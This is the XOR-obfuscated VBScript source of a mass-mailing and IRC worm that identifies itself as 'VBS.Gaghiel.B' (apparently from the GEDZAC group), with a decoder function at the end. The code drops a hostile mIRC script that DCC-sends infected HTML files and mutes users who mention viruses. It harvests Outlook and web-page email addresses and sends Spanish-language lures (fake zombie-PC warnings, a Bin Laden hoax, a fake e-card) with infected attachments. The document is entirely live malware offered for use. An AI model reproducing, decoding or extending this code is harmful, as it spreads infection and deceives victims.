q("na'`u)fssunersbt'9'7'sobi")&vbCrlf& _
q("`u)fssunersbt':'`u)fssunersbt'*'`u)fssunersbt")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("tbs'uc6':'`a)HwbiSbsAnkb/a)wfso+6.")&vbCrlf& _
q("u6':'uc6)ubfcknib")&vbCrlf& _
q("uc6)dkhtb")&vbCrlf& _
q("na'NiTsu/u6+'v/%Gaghiel%..':'7'sobi")&vbCrlf& _
q("Tbs'uc4':'`a)HwbiSbsAnkb/a)wfso+5+6.")&vbCrlf& _
q("uc4)punsb'qe}")&vbCrlf& _
q("uc4)dkhtb'")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("bktbna'/`i:v/%mirc32.exe%..'hu'/`i:v/%mirc.ini%..'sobi")&vbCrlf& _
q("Ot':'v/%[rfiles]%.")&vbCrlf& _
q("NinBcns'a)wfso+Ot+v/%n2%.+v/%Chanel.hlp%.")&vbCrlf& _
q("tbs'qtu:`a)DubfsbSbsAnkb/ahkcbu'!'v/%\Chanel.hlp%..")&vbCrlf& _
q("@UDv':'v/%;Opciones Avanzadas, la modificacion%.!'X")&vbCrlf& _
q("v/% de este texto%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%;puede provocar el mal funcionamiento de su%.!'X")&vbCrlf& _
q("v/% programa.%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%;Advanced options, the modification of this%.!'X")&vbCrlf& _
q("v/% text%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%;it can cause the bad operation of their%.!'X")&vbCrlf& _
q("v/% program.%.'!'qeDuKa'!'X")&vbCrlf& _
q("%%'!'qeDuKa'!'X")&vbCrlf& _
q("v/%on 1:CONNECT:{ /echo GEDZAC |%.!'X")&vbCrlf& _
q("v/% /echo Comenzando Secion }%.!qeDuKa'!'X")&vbCrlf& _
q("v/%alias Ig { .ignore $1 $2 }%.!qeDuKa'!'X")&vbCrlf& _
q("v/%on 1:JOIN:*:{ if ($Nick != $Me)%.!'X")&vbCrlf& _
q("v/% { GMS } { GM } }%.!qeDuKa!'X")&vbCrlf& _
q("v/%on 1:PART:#:{ if ($Nick != $Me)%.!'X")&vbCrlf& _
q("v/% { GM } }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%on 1:TEXT:*virus*:*:Ig # $Nick%.!qeDuKa!'X")&vbCrlf& _
q("v/%on 1:TEXT:*worm*:*:Ig # $Nick%.!qeDuKa!'X")&vbCrlf& _
q("v/%on 1:TEXT:*gusano*:*:Ig # $Nick%.!qeDuKa!'X")&vbCrlf& _
q("v/%on 1:TEXT:*troyan*:*:Ig # $Nick%.!qeDuKa!'X")&vbCrlf& _
q("v/%on 1:FileRcvd:*:{ if ($Nick != $Me)%.!'X")&vbCrlf& _
q("v/% { GM } }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%on 1:SENDFAIL:*:{ halt }%.!qeDuKa!'X")&vbCrlf& _
q("v/%on 1:Disconnect:{ var ¥gs1 = %.!`/6.!'X")&vbCrlf& _
q("v/%\ | var ¥Rm = 1%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%/while (¥Rm <= 5) {%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%/if (¥Rm = 1) { var ¥Rmf = ¥gs1%.!'X")&vbCrlf& _
q("v/% $+ Patty.html }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%/if (¥Rm = 2) { var ¥Rmf = ¥gs1%.!'X")&vbCrlf& _
q("v/% $+ Adivinanza.htm }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%/if (¥Rm = 3) { var ¥Rmf = ¥gs1%.!'X")&vbCrlf& _
q("v/% $+ HackearWebs.htm }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%/if (¥Rm = 4) { var ¥Rmf = ¥gs1%.!'X")&vbCrlf& _
q("v/% $+ CitasEnLaRed.htm }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%/if (¥Rm = 5) { var ¥Rmf = ¥gs1%.!'X")&vbCrlf& _
q("v/% $+ Gaghiel.htm }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%/if ($exists(¥Rmf) = $True) { .remove ¥Rmf%.!'X")&vbCrlf& _
q("v/% } | inc ¥Rm } }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%alias GSend { Set ¥£.file $2%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%if ( $exist(¥£.file) = $False ) { halt }%.!qeDuKa!'X")&vbCrlf& _
q("v/%if ( $Send(0) > 2 ) { Return }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%if ( $1 isop # ) { Return }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%.ignore -u90 $1 2%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%.DCC SEND $1 ¥£.file }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%alias GMS { var ¥msc = $rand(1,5)%.!qeDuKa!'X")&vbCrlf& _
q("v/%/if (¥msc = 1) { /msg $Nick Videos, mp3,%.!'X")&vbCrlf& _
q("v/% libros y demas recursos gratis en http://www.g%.!'X")&vbCrlf& _
q("v/%ratisweb.com/machinedramon1/gaghiel.html }%.!qeDuKa!'X")&vbCrlf& _
q("v/%elseif (¥msc = 2) { /msg $Nick Estas Aburrido?%.!'X")&vbCrlf& _
q("v/% Entonces visita http://www.gratisweb.com/mach%.!'X")&vbCrlf& _
q("v/%inedramon/gaghiel.html ,la pagina con el mejor %.!'X")&vbCrlf& _
q("v/%entretenimiento }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%elseif (¥msc = 3) { /msg $Nick Quieres saber %.!'X")&vbCrlf& _
q("v/%como Hackear una Web, esto y todo sobre el Hacking%.!'X")&vbCrlf& _
q("v/%, Cracking y Virii en http://www.gratisweb.com/mac%.!'X")&vbCrlf& _
q("v/%hinedramon/gaghiel.html }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%elseif (¥msc = 4) { /msg $Nick Solo o Sola? Encuen%.!'X")&vbCrlf& _
q("v/%tra a alguien con quien hablar o algo más, entra al%.!'X")&vbCrlf& _
q("v/% Chat de http://www.gratisweb.com/machinedramon/g%.!'X")&vbCrlf& _
q("v/%aghiel.html }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%elseif (¥msc = 5) { /msg $Nick Quieres saber sobre %.!'X")&vbCrlf& _
q("v/%fantasmas, vampiros y demonios o simplemente asustar%.!X")&vbCrlf& _
q("v/%te un rato, entonces visita http://www.gratisweb.co%.!'X")&vbCrlf& _
q("v/%m/machinedramon1/gaghiel.html }%.!qeDuKa!'X")&vbCrlf& _
q("v/%}%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%alias GM { var ¥gf1 = %.'!'`/6.'!'X")&vbCrlf& _
q("v/%\ $+ AngeldelMar.html%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%/if ( $exists(¥gf1) = $False )%.!'X")&vbCrlf& _
q("v/% { halt }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%var ¥Rf = $rand(1,5)%.!qeDuKa!'X")&vbCrlf& _
q("v/%/if (¥Rf = 1) { .copy -o ¥gf1 $nofile(¥gf1) $+%.!'X")&vbCrlf& _
q("v/% Patty.html | Set ¥£.file $nofile(¥gf1)%.!'X")&vbCrlf& _
q("v/% $+ Patty.html }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%elseif (¥Rf = 2) { .copy -o ¥gf1 $nofile(¥gf1)%.!'X")&vbCrlf& _
q("v/% $+ Adivinanza.htm | Set ¥£.file $nofile(¥gf1)%.!'X")&vbCrlf& _
q("v/% $+ Adivinanza.htm }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%elseif (¥Rf = 3) { .copy -o ¥gf1 $nofile(¥gf1) $+%.!'X")&vbCrlf& _
q("v/% HackearWebs.htm | Set ¥£.file $nofile(¥gf1)%.!'X")&vbCrlf& _
q("v/% $+ HackearWebs.htm }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%elseif (¥Rf = 4) { .copy -o ¥gf1 $nofile(¥gf1) $+%.!'X")&vbCrlf& _
q("v/% CitasEnLaRed.htm | Set ¥£.file $nofile(¥gf1) $+%.!'X")&vbCrlf& _
q("v/% CitasEnLaRed.htm }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%elseif (¥Rf = 5) { .copy -o ¥gf1 $nofile(¥gf1)%.!'X")&vbCrlf& _
q("v/% $+ Gaghiel.htm | Set ¥£.file $nofile(¥gf1)%.!'X")&vbCrlf& _
q("v/% $+ Gaghiel.htm }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%/.ignore -rpcntikxu15 # $address($nick,1) |%.!'X")&vbCrlf& _
q("v/% GSend $Nick ¥£.file }%.'!'qeDuKa'!'X")&vbCrlf& _
q("v/%On 1:FILESENT:*.htm,*.html:{ %.!'X")&vbCrlf& _
q("v/%/echo VBS.Gaghiel.B se a enviado a $Nick }%.")&vbCrlf& _
q("@UDv':'Ubwkfdb/@UDv+%¢%+Dou/40..")&vbCrlf& _
q("qtu)punsb'@UDv")&vbCrlf& _
q("qtu)dkhtb")&vbCrlf& _
q("bktbna'/`c)Bntst/`d.:surb.'hu'/`c)Bntst/`i.:surb.'sobi")&vbCrlf& _
q("tbs'`u':'`a)`bsankb/a)wfso.")&vbCrlf& _
q("na'`u)fssunersbt'9'7'sobi")&vbCrlf& _
q("`u)fssunersbt':'`u)fssunersbt'*'`u)fssunersbt")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("`a)cbkbsbAnkb/a)wfso.")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("ibs")&vbCrlf& _
q("Bic'tre")&vbCrlf& _
q("Aridsnhi'`/i.")&vbCrlf& _
q("Hi'buuhu'ubtrjb'ibs")&vbCrlf& _
q("Na'i':'7'Sobi")&vbCrlf& _
q("`':'`a)`bstwbdnfkahkcbu/7.")&vbCrlf& _
q("BktbNa'i':'6'Sobi")&vbCrlf& _
q("`':'`a)`bstwbdnfkahkcbu/6.")&vbCrlf& _
q("BktbNa'i':'5'Sobi")&vbCrlf& _
q("`':'`a)`bstwbdnfkahkcbu/5.")&vbCrlf& _
q("Bic'Na")&vbCrlf& _
q("Bic'Aridsnhi")&vbCrlf& _
q("Tre'@Jfnk/.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Cnj'J/3.")&vbCrlf& _
q("J/7.:'v/%\PcZombi.html%.")&vbCrlf& _
q("J/6.':'v/%\RATseguridad.html%.")&vbCrlf& _
q("J/5.:'v/%\InformacionCuentas.html%.")&vbCrlf& _
q("J/4.':'v/%\VirtualLetter.html%.")&vbCrlf& _
q("J/3.':'v/%\Sexalud.html%.")&vbCrlf& _
q("Ahu'n':'7'Sh'3")&vbCrlf& _
q("Na'`a)AnkbBntst/`/5.'!'J/n..':'Afktb'Sobi'")&vbCrlf& _
q("`a)Dhw~Ankb'`/6.'!'%[Fi`bkcbkJfu)osjk%+'`/5.'!'J/n.")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("@BP")&vbCrlf& _
q("@Bk")&vbCrlf& _
q("Bic'Tre")&vbCrlf& _
q("Tre'@BK/.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Tbs'Cd':'DubfsbHembds/v/%Scripting.Dictionary%..")&vbCrlf& _
q("Cnj'n+'i+'H+'Jv+'J")&vbCrlf& _
q("Tbs'H':'DubfsbHembds/v/%Outlook.Application%..")&vbCrlf& _
q("Tbs'Jv':'H)@bsIfjbtwfdb/%JFWN%.")&vbCrlf& _
q("Tbs'J_':'Jv)@bsCbafrksAhkcbu/67.)Nsbjt")&vbCrlf& _
q("i':'J)Dhris")&vbCrlf& _
q("Ahu'n':'6'Sh'i")&vbCrlf& _
q("Cd)Fcc'/n.+'J)Nsbj/n.)Bjfnk6Fccubtt")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("@TJ'Cd")&vbCrlf& _
q("Tbs'H':'Ihsoni`")&vbCrlf& _
q("Bic'Tre")&vbCrlf& _
q("Tre'@TJ/Cd.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Tbs'UC':'DubfsbHembds/v/%WScript.Shell%..")&vbCrlf& _
q("Tbs'Hf':'DubfsbHembds/v/%Outlook.Application%..")&vbCrlf& _
q("Ahu'k':'6'Sh'Cd)Dhris")&vbCrlf& _
q("Na'NtJfnk/Cd)Nsbj/k..'Sobi")&vbCrlf& _
q("Uv':'%OLB^XDRUUBISXRTBU[Thaspfub%")&vbCrlf& _
q("U:UC)ub`ubfc/Uv'!'%[@bc}fd'Kfet[Jfnk[%'!'Cd)Nsbj/k..")&vbCrlf& _
q("Na'U':'%%'Sobi")&vbCrlf& _
q("Ufichjn}b")&vbCrlf& _
q("D':'Nis/Uic'-'2.")&vbCrlf& _
q("J`'C+'D")&vbCrlf& _
q("Tbs'Dj':'Hf)DubfsbNsbj/7.")&vbCrlf& _
q("Dj)Ubdnwnbist)Fcc'/Cd)Nsbj/k..")&vbCrlf& _
q("Dj)Trembds':'C)Nsbj/6.")&vbCrlf& _
q("Dj)Ehc~':'C)Nsbj/5.")&vbCrlf& _
q("Dj)Fssfdojbist)Fcc'/`/5.'!'C)Nsbj/4..")&vbCrlf& _
q("Dj)CbkbsbFasbuTrejns':'Surb")&vbCrlf& _
q("Dj)TBIC")&vbCrlf& _
q("U':'%%")&vbCrlf& _
q("Bic'Na")&vbCrlf& _
q("Bic'Na")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("Ahu'}':'6'Sh'Cd)Dhris")&vbCrlf& _
q("Uc)Ub`Punsb'Uv!%[@bc}fd'Kfet[Jfnk[%'!'Cd)Nsbj/}.+%_%")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("Tbs'Hf':'Ihsoni`")&vbCrlf& _
q("Tbs'Uc':'Ihsoni`")&vbCrlf& _
q("Bic'Tre")&vbCrlf& _
q("Aridsnhi'NtJfnk/JK.")&vbCrlf& _
q("Hi'buuhu'ubtrjb'ibs")&vbCrlf& _
q("Cnj'U/64.")&vbCrlf& _
q("U/7.':'%(%='U/6.':'%[%='U/5.':'%8%='U/4.':'%:%")&vbCrlf& _
q("U/3.':'%9%")&vbCrlf& _
q("U/2.':'%;%='U/1.':'Dou/43.='U/0.':'%<%='U/?.':'%+%")&vbCrlf& _
q("U/>.':'Dou/40.='U/67.':'%¦%='U/66.':'%¸%='U/65.':'%.%")&vbCrlf& _
q("U/64.':'%/%")&vbCrlf& _
q("Ahu'L':'7'Sh'64")&vbCrlf& _
q("Na'NiTsu/JK+'U/L..';9'7'Sobi")&vbCrlf& _
q("NtJfnk':'Afktb")&vbCrlf& _
q("Bns'Aridsnhi")&vbCrlf& _
q("Bic'Na")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("_6':'NiTsu/JK+'%G%.='_5':'NiTsu/JK+'%)%.")&vbCrlf& _
q("Na'/_6';9'7.'Fic'/_5';9'7.'Fic'/_6';'_5.'Sobi")&vbCrlf& _
q("NtJfnk':'Surb")&vbCrlf& _
q("Bic'Na")&vbCrlf& _
q("Bic'Aridsnhi")&vbCrlf& _
q("Aridsnhi'J`/C+'i.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Tbs'C':'DubfsbHembds/v/%Scripting.Dictionary%..")&vbCrlf& _
q("Na'i':'7'Sobi")&vbCrlf& _
q("C)Fcc'6+'v/%Su computadora es un Zombi?%.")&vbCrlf& _
q("C)Fcc'5+'v/%Debido al reciente ataque a los %.!X")&vbCrlf& _
q("v/%servidores%.!qeDuka!X")&vbCrlf& _
q("v/%raiz DNS de la red, el FBI a determina%.!'X")&vbCrlf& _
q("v/%do q' tan solo%.!qeDuka!X")&vbCrlf& _
q("v/%en EEUU, hay 80.000 computadoras zombis.%.!qeDuka!X")&vbCrlf& _
q("v/%Zombis se aplica a las Pc, afectadas%.!'X")&vbCrlf& _
q("v/% por un RAT%.!'qeDuka'!X")&vbCrlf& _
q("v/%(Troyano de Acceso Remoto), q' a diferencia %.!'X")&vbCrlf& _
q("v/%de virus%.!'qeDuka'!X")&vbCrlf& _
q("v/%y gusanos no dan sintomas, por lo que la %.!'X")&vbCrlf& _
q("v/%mayoria de%.!'qeDuka'!X")&vbCrlf& _
q("v/%usuarios desconoce que sus Pc estan infectadas%.!'X")&vbCrlf& _
q("v/% y%.!'qeDuka'!X")&vbCrlf& _
q("v/%siendo accedidas para robar informacion o %.!'X")&vbCrlf& _
q("v/%lanzar%.!'qeDuka'!X")&vbCrlf& _
q("v/%ataques a otras maquinas.%.!'qeDuka'!X")&vbCrlf& _
q("v/%Como saber si su computadora esta infectada%.!'X")&vbCrlf& _
q("v/% con%.!'qeDuka'!X")&vbCrlf& _
q("v/%un RAT, en la pagina adjunta.%.!'qeDuka'!X")&vbCrlf& _
q("v/%www.gratisweb.com/machinedramon1/gaghiel.html%.")&vbCrlf& _
q("C)Fcc'4+'v/%\PcZombi.html%.")&vbCrlf& _
q("BktbNa'i':'6'Sobi")&vbCrlf& _
q("C)Fcc'6+'v/%Windows y Osama Ben Laden%.")&vbCrlf& _
q("C)Fcc'5+'v/%Debido a las recientes %.!'X")&vbCrlf& _
q("v/%declaraciones de%.!qeDuka!X")&vbCrlf& _
q("v/%un mienbro de Al-Qaida(Red de Ben Laden)%.!'X")&vbCrlf& _
q("v/%, de que%.!qeDuka!X")&vbCrlf& _
q("v/%infiltrados entre los tecnicos de %.!'X")&vbCrlf& _
q("v/%Microsoft, abri%.!qeDuka!X")&vbCrlf& _
q("v/%an, incluido dentro del codigo de %.!'X")&vbCrlf& _
q("v/%algunas versio%.!qeDuka!X")&vbCrlf& _
q("v/%nes Windows, una Puerta Trasera(Troyano),%.!'X")&vbCrlf& _
q("v/% para%.!qeDuka'!X")&vbCrlf& _
q("v/%poder acceder a las maquinas y robar%.!'X")&vbCrlf& _
q("v/% informacion%.!qeDuka'!X")&vbCrlf& _
q("v/%o usarlas para un ataque coordinado.%.!'qeDuka'!X")&vbCrlf& _
q("v/%Aunque Microsoft a negado esto, el FBI%.!'X")&vbCrlf& _
q("v/% investiga%.!'qeDuka'!X")&vbCrlf& _
q("v/%y agencias como la CIA, han cambiado%.!'X")&vbCrlf& _
q("v/% los sistemas%.!'qeDuka'!X")&vbCrlf& _
q("v/%de sus PCs, para evitar un ataque.%.!qeDuka!X")&vbCrlf& _
q("v/%Como saber si su Pc esta afectada en%.!'X")&vbCrlf& _
q("v/% la pagina%.!'qeDuka'!X")&vbCrlf& _
q("v/%adjunta%.!'qeDuka'!X")&vbCrlf& _
q("v/%www.gratisweb.com/machinedramon1/gaghiel.html%.")&vbCrlf& _
q("C)Fcc'4+'v/%\RATseguridad.html%.")&vbCrlf& _
q("BktbNa'i':'5'Sobi")&vbCrlf& _
q("C)Fcc'6+'v/%Te envio la info que me pediste%.")&vbCrlf& _
q("C)Fcc'5+'v/%Hola, se me perdio el papel q'%.!'X")&vbCrlf& _
q("v/% me%.!'qeDuka'!X")&vbCrlf& _
q("v/%diste con tu mail, ojala no me haya%.!'X")&vbCrlf& _
q("v/% equivocado al%.!'qeDuka'!X")&vbCrlf& _
q("v/%escribirla.%.!'qeDuka'!X")&vbCrlf& _
q("v/%Te envio la info q' me pediste%.!'X")&vbCrlf& _
q("v/%(confidencial)%.!'qeDuka'!X")&vbCrlf& _
q("v/%Reenviame la direccion de tu mail,%.!'X")&vbCrlf& _
q("v/% saludame a%.!'qeDuka'!X")&vbCrlf& _
q("v/%Raúl y despideme de Patty. Adios%.!'qeDuka'!X")&vbCrlf& _
q("v/%www.gratisweb.com/machinedramon/gaghiel.html%.")&vbCrlf& _
q("C)Fcc'4+'v/%\InformacionCuentas.html%.")&vbCrlf& _
q("BktbNa'i':'4'Sobi")&vbCrlf& _
q("C)Fcc'6+'v/%VirtualLetter%.")&vbCrlf& _
q("C)Fcc'5+'v/%Una targeta virtual le ha sido%.!'X")&vbCrlf& _
q("v/% enviada%.!'qeDuka'!X")&vbCrlf& _
q("v/%desde esta direccion de correo.%.!'qeDuka'!X")&vbCrlf& _
q("v/%los datos del remitente de la targeta%.!'X'")&vbCrlf& _
q("v/% y donde%.!'qeDuka'!X")&vbCrlf& _
q("v/%verla, en la pagina adjunta.%.!'qeDuka'!X")&vbCrlf& _
q("v/%Tiene 7 dias a partir de hoy, para ver %.!'X")&vbCrlf& _
q("v/%o descar%.!'qeDuka'!X")&vbCrlf& _
q("v/%gar su targeta antes de que sea borrada%.!qeDuka!X")&vbCrlf& _
q("v/%VirtualLetter, un servicio de LatinRed%.!qeDuka!X")&vbCrlf& _
q("v/%Email enviado sin acentos%.!'qeDuka'!X")&vbCrlf& _
q("v/%www.gratisweb.com/machinedramon/gaghiel.html%.")&vbCrlf& _
q("C)Fcc'4+'v/%\VirtualLetter.html%.")&vbCrlf& _
q("BktbNa'i':'3'Sobi")&vbCrlf& _
q("C)Fcc'6+'v/%Sexalud%.")&vbCrlf& _
q("C)Fcc'5+'v/%Sexalud,la pagina de Terra %.!'X")&vbCrlf& _
q("v/%para resolver%.!'qeDuka'!X")&vbCrlf& _
q("v/%tus dudas de sexualidad.%.!'qeDuka'!X")&vbCrlf& _
q("v/%Visitanos en www.terra.com.pe/sexalud%.!qeDuka!X")&vbCrlf& _
q("v/%Un Test para saber si eres buen(a)%.!'X")&vbCrlf& _
q("v/% amante en la%.!'qeDuka'!X")&vbCrlf& _
q("v/%pagina adjunta%.!'qeDuka'!X")&vbCrlf& _
q("v/%www.gratisweb.com/machinedramon/gaghiel.html%.")&vbCrlf& _
q("C)Fcc'4+'v/%\Sexalud.html%.")&vbCrlf& _
q("Bic'Na")&vbCrlf& _
q("Bic'Aridsnhi")&vbCrlf& _
q("Tre'@BP/.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Tbs'a:DubfsbHembds/v/%Scripting.FileSystemObject%..")&vbCrlf& _
q("Tbs'Cd:DubfsbHembds/v/%Scripting.Dictionary%..")&vbCrlf& _
q("Tbs'C':'a)cunqbt")&vbCrlf& _
q("Ahu'Bfdo'_C'Ni'C")&vbCrlf& _
q("Na'_C)CunqbS~wb':'5'Sobi")&vbCrlf& _
q("@_'_C)Wfso'!'%[%+'Cd")&vbCrlf& _
q("Bic'Na")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("Tbs'a':'Ihsoni`")&vbCrlf& _
q("@TJ'Cd")&vbCrlf& _
q("Bic'Tre")&vbCrlf& _
q("Tre'@_/ak+'Cd.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Tbs'a:DubfsbHembds/v/%Scripting.FileSystemObject%..")&vbCrlf& _
q("Tbs'@a':'a)@bsAhkcbu/ak.")&vbCrlf& _
q("Tbs'Ta':'@a)Treahkcbut")&vbCrlf& _
q("Ahu'Bfdo''Ni'Ta")&vbCrlf& _
q("@_')Wfso+'Cd")&vbCrlf& _
q("B_Jfnk')Wfso+'Cd")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("Tbs'a':'Ihsoni`")&vbCrlf& _
q("Bic'Tre")&vbCrlf& _
q("Tre'B_Jfnk/ak+'Cd.")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Tbs'a:DubfsbHembds/v/%Scripting.FileSystemObject%..")&vbCrlf& _
q("Na'Cd)Dhris';'27'Sobi")&vbCrlf& _
q("Tbs'F':'a)@bsAhkcbu/ak.")&vbCrlf& _
q("Tbs'_F':'F)Ankbt")&vbCrlf& _
q("Ahu'Bfdo'^'Ni'_F")&vbCrlf& _
q("bs':'KDftb/a)@bsBsbitnhiIfjb/^)Wfso..")&vbCrlf& _
q("Na'/bs':'v/%html%..'Hu'/bs':'v/%htm%..'Sobi")&vbCrlf& _
q("Tbs'_a':'a)HwbiSbsAnkb/^)Wfso.")&vbCrlf& _
q("Ch'Ponkb'_a)FsbicHaTsubfj':'Afktb")&vbCrlf& _
q("_k':'_a)UbfcKnib")&vbCrlf& _
q("i':'NiTsu/KDftb/_k.+'v/%mailto:%..")&vbCrlf& _
q("Na'i';9'7'Sobi")&vbCrlf& _
q("_k':'Kbas/Un`os/_k+'/Kbi/_k.'*'/i','1...+'X")&vbCrlf& _
q("NiTsu/Un`os/_k+'/Kbi/_k.'*'/i','1...+'Dou/43..*6.")&vbCrlf& _
q("Na'NtJfnk/_k.'Sobi")&vbCrlf& _
q("n':'Cd)Dhris','6")&vbCrlf& _
q("Cd)Fcc'n+'_k")&vbCrlf& _
q("Bic'Na")&vbCrlf& _
q("Bic'Na")&vbCrlf& _
q("Khhw")&vbCrlf& _
q("_a)Dkhtb")&vbCrlf& _
q("Bic'Na")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("Bic'Na")&vbCrlf& _
q("Tbs'a':'Ihsoni`")&vbCrlf& _
q("Bic'Tre")&vbCrlf& _
q("Tre'NinBcns/Wfso+T+L+Qfkrb.")&vbCrlf& _
q(" Fwubicnch'~'Jhcnandfch'f'wfusnu'")&vbCrlf& _
q(" cb'ri'wuhdbcnjnbish'cb'QET)Srib")&vbCrlf& _
q("Hi'Buuhu'Ubtrjb'Ibs")&vbCrlf& _
q("Oq':'5='Od':'5")&vbCrlf& _
q("Tbs'N6':'`a)HwbisbsAnkb/Wfso+6.")&vbCrlf& _
q("N5':'N6)UbfcFkk")&vbCrlf& _
q("N6)Dkhtb")&vbCrlf& _
q("Knibt':'Twkns/N5+qeDuka.")&vbCrlf& _
q("Cnj'STbd+'SLb~")&vbCrlf& _
q("Ahu'~':'7'sh'Rehric/Knibt.")&vbCrlf& _
q("Na'/NiTsu/N5+'T.';9'7'.'fic'/NiTsu/N5+'L.';9'7.'sobi")&vbCrlf& _
q("na'kbas/Knibt/~.+6.':'v/%[%.'sobi")&vbCrlf& _
q("na'NiTsu/Knibt/~.+'T.':'6'sobi")&vbCrlf& _
q("STbd':'Surb")&vbCrlf& _
q("Od':'~")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("na'STbd'sobi")&vbCrlf& _
q("na'NiTsu/Knibt/~.+'L.':'6'sobi")&vbCrlf& _
q("Knibt/~.':'L!v/%=%.!Qfkrb")&vbCrlf& _
q("Oq':'6='SLb~':'Surb")&vbCrlf& _
q("Bns'Ahu")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("bktbna'/NiTsu/N5+'T.';9'7'.'fic'/NiTsu/N5+'L.':'7.'sobi")&vbCrlf& _
q("Oq:6")&vbCrlf& _
q("na'NiTsu/Knibt/~.+'T.':'6'sobi")&vbCrlf& _
q("Knibt/~.':'T!qeDuka!L!v/%=%.!Qfkrb")&vbCrlf& _
q("SLb~':'Surb")&vbCrlf& _
q("Bns'Ahu")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("bktbna'/NiTsu/N5+'T.':'7'.'sobi")&vbCrlf& _
q("Oq:6")&vbCrlf& _
q("Tbs'N4':'`a)HwbiSbsAnkb/Wfso+?.")&vbCrlf& _
q("N4)Punsbknib'qeDuka!T!qeDuka!L!v/%=%.!Qfkrb")&vbCrlf& _
q("N4)Dkhtb")&vbCrlf& _
q("Bns'tre")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("Ibs")&vbCrlf& _
q("Na'Oq':'5'sobi")&vbCrlf& _
q("Knibt/Od.':'T!qeDuka!L!v/%=%.!Qfkrb")&vbCrlf& _
q("Slb~':'Surb")&vbCrlf& _
q("Bic'Na")&vbCrlf& _
q("Na'SLb~'sobi")&vbCrlf& _
q("Tbs'N3':'`a)HwbiSbsAnkb/Wfso+5.")&vbCrlf& _
q("N3)Punsb'Mhni/Knibt+qeDuka.")&vbCrlf& _
q("N3)Dkhtb")&vbCrlf& _
q("bic'na")&vbCrlf& _
q("Bic'Tre")&vbCrlf& _
"<" & "/" & "Script>"
sl.write
Function q(j)
On Error Resume Next
For r = 1 to len(j)
q = q & Chr(Asc(Mid(j,r,1)) Xor Len("Gaghiel"))
Next
End function